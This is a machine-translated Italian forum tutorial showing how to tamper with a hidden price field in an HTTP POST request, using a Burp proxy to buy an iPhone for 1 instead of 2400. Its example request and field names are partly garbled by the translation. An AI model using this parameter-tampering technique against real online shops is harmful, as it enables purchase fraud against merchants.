Questo articolo è un articolo speculare di traduzione automatica, clicca qui per saltare all'articolo originale.

Architect_Programmer_Code Rete Agricola»Architetto Altre tecnologie Attacco e difesa sicuri Penetrazione di intrusione: applicazione delle intestazioni HTTP
Vista: 12586|Risposta: 0

[Tutorial sulla sicurezza] Penetrazione di intrusione: applicazione delle intestazioni HTTP

[Copiato link]
Pubblicato su 07/02/2015 17:59:07 | | |

Informazioni sull'applicazione delle intestazioni HTTP

L'intestazione http è comunemente usata nel meccanismo di trasmissione dei siti web, ma la maggior parte dei principianti in Cina non ha notato questo pezzo; questo articolo è dedicato solo ai principianti, il ruolo dell'intestazione http nel processo di intrusione.

Prendiamo la pagina shopping come esempio per analizzare una piccola parte del ruolo delle intestazioni HTTP.

Per prima cosa, analizziamo un modulo nella pagina degli acquisti.

<form method="post" azione="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<input type="hidden" name="price" value="449">

<input type="submit" value="Buy">

</form>

Durante il processo di apertura, fai uno screenshot dell'intestazione del messaggio http e dai un'occhiata

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantità=1&prezzo=2400

Anche se il campo prezzo non viene visualizzato sulla pagina all'apertura della pagina degli acquisti, può comunque essere modificato e gestito dall'utente.

Ci sono due modi per ottenere il montaggio

1. Salva il codice sorgente HTML per la modifica, poi ricaricalo nel browser per eseguirlo

2. Usare l'intercettazione proxy per modificare le intestazioni HTTP (costruzione proxy in tool burp)

Prendiamo come esempio l'intestazione HTTP sopra
Prima del cambiamento
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantità=1&prezzo=2400

Dopo il cambiamento
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantità=1&prezzo=1


Nell'ultima riga il campo Prezzo ha un valore di 2400 e se lo cambiiamo a 1 possiamo prendere l'iPhone 4S a un prezzo più basso.

Questo articolo fornisce solo un'idea di vantaggi inaspettati come l'iniezione di LDAP.




Precedente:Metodo di implementazione della password per recupero password MySQL
Prossimo:SQL injection per ottenere il percorso completo del sito web

Post correlati
Disconoscimento:
Tutto il software, i materiali di programmazione o gli articoli pubblicati dalla Code Farmer Network sono destinati esclusivamente all'apprendimento e alla ricerca; I contenuti sopra elencati non devono essere utilizzati per scopi commerciali o illegali, altrimenti gli utenti dovranno sostenere tutte le conseguenze. Le informazioni su questo sito provengono da Internet, e le controversie sul copyright non hanno nulla a che fare con questo sito. Devi eliminare completamente i contenuti sopra elencati dal tuo computer entro 24 ore dal download. Se ti piace il programma, ti preghiamo di supportare software autentico, acquistare la registrazione e ottenere servizi autentici migliori. In caso di violazione, vi preghiamo di contattarci via email.
Mail To:help@itsvse.com